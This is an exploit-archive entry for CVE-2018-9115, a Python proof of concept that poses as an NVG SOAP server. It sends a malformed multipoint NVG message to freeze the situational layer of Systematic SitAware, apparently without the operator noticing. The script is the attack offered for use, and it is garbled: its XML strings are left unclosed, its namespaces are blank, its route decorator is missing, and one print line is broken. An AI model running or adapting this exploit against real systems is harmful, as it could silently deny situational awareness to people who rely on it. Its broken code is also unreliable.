Systematic SitAware - NVG Denial of Service

EKU-ID: 7493 CVE: 2018-9115 OSVDB-ID:
Author: 2u53 Published: 2018-04-02 Verified: Verified



# Exploit Title: SitAware NVG Denial of Service
# Date: 03/31/2018
# Exploit Author: 2u53
# Vendor Homepage:
# Version: 6.4 SP2
# Tested on: Windows Server 2012 R2
# CVE: CVE-2018-9115

# Remarks: PoC needs bottlypy:

# Systematic's SitAware does not validate input from other sources suffenciently. Incoming information utilizing
# the for example the NVG interface. The following PoC will freeze the Situational Layer of SitAware, which means
# that the Situational Picture is no more updated. Unfortunately the user can not notice until
# he tries to work with the situational layer.


from bottle import post, run, request, response

LHOST = # Local IP which the NVG server should use
LPORT = 8080 # Local Port on which the NVG server should listen

GET_CAPABILITIES = '''<soap:Envelope xmlns:soap=""> <soap:Body>
<ns3:GetCapabilitiesResponse xmlns="" xmlns:ns2="" xmlns:ns3="" xmlns:ns4="">
<ns4:nvg_capabilities version="1.5">

EVIL_NVG = '''<soap:Envelope xmlns:soap=""> <soap:Body>
<ns3:GetNvgResponse xmlns="" xmlns:ns2="" xmlns:ns3="" xmlns:ns4="">
<ns4:nvg version="1.5" classification="NATO UNCLASSIFIED">
<ns4:multipoint points="-0.01,0.01 0.02,-0.02 0.01,0.01" symbol="2525b:GFTPZ---------X"

def soap():
    action = dict(request.headers.items()).get('Soapaction')
    action = action.replace('"', '')
    print('Incoming connection')

    response.content_type = 'text/xml;charset=utf-8'

    if action.endswith('nvg/GetCapabilities'):
        print('Sending capabilities to victim'...)
        return GET_CAPABILITIES
        print('Done! Waiting for NVG request...')
    elif action.endswith('nvg/GetNvg'):
        print('Sending evil NVG')
        return EVIL_NVG
        print('Invalid request received')

run(host=LHOST, port=LPORT)